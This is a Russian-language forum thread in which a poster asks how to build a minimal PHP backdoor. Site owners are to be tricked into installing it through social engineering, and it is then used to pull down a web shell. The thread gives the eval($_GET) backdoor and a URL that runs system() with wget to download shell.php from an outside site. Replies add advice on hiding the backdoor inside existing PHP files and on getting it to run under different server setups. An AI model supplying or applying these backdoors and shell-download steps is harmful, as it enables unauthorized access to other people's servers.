Цель : создать phtml файл с минимальным кодом для дальнейшей загрузки на сервер через этот файл шелл Мне подсказали eval($_GET['name']) Через команду http://site.ru/1.phtml?name=system(“wget site.com/shell.php”) загрузка шелла на сервер Сам файл будет в формате phtml Все верно ?
Шёл 2018 год. Ещё можешь поставить расширение php4 или php5. [troll mode off] Слишком палевно. Бекдор лучше внедрять в уже существующие пхп-файлы. А если и создавать новый то расширение должно быть php а не phtml.
Можно, но зависит от сервера. Если там какой-нибудь древний апач с mod_php то через htaccess. Если что-то современное то надо знать значение опции "Server API" из phpinfo.
Нету. Может там IIS вообще стоит. Закидывай пхп-файл с кодом <?php phpinfo(); ?> и скидывай сюда значение Server API.
сервер не мой ) цель создать почти универсальный скрипт который будет работать почти на всех обычных хостеров на базе линукс и загружать туда мои шелли этот файл владельцы сайтом сами будут ставить благодаря СИ поэтому нужно чтоб там минимальный код который я смогу спрятать а потом уже загрузить туда шелл для получения доступа к серверу
Если шелл должен быть универсальным то расширение должно быть php а не phtml. Расширение phtml устарело. Раньше (во времена пхп4, начало пхп5) оно использовалось для включения в html-страницу примитивных пхп-скриптов на несколько строк кода. Из той-же серии расширения: php4, php5 Сейчас везде для пхп-скриптов стандарт - расширение php. Если на сервере nginx без apache то без админских прав ты никак не заставишь работать скрипт под другим расширением. А apache 2.4 по умолчанию игнорирует htaccess. Если даже тебе повезло и апач читает .htaccess то пхп у него может быть подключен разными способами: через mod_php, через php-fpm или простым cgi. И для каждой конфигурации тебе надо прописывать в .htaccess разные параметры чтобы заставить работать пхп с расширением phtml. В общем это неоправданный гемор.
Т.е самый оптимальный вариант это купить хостинг там где находится сайт, изучить конфигурацию и под данный сервер выбрать оптимальный вариант
Нет. Shared-хостинг уже отмирает. Сейчас в тренде vps-хостинг и железные серверы. Внутри vps-ки может быть вообще что угодно. Там может быть какая угодно панель управления: ispmanager, vestacp, plesk, cpanel, ispconfig и десятки других менее известных панелей. Толку с того что ты купишь vps у того-же хостера нет: содержимое сервера наверняка будет другим. Не, ну конечно если ты собрался бекдорить говносайты на дешманском шаред-хостинге за 50 рублей - может твой вариант и сработает. А вообще (чисто моё мнение), оптимальный вариант: не заниматься ерундой.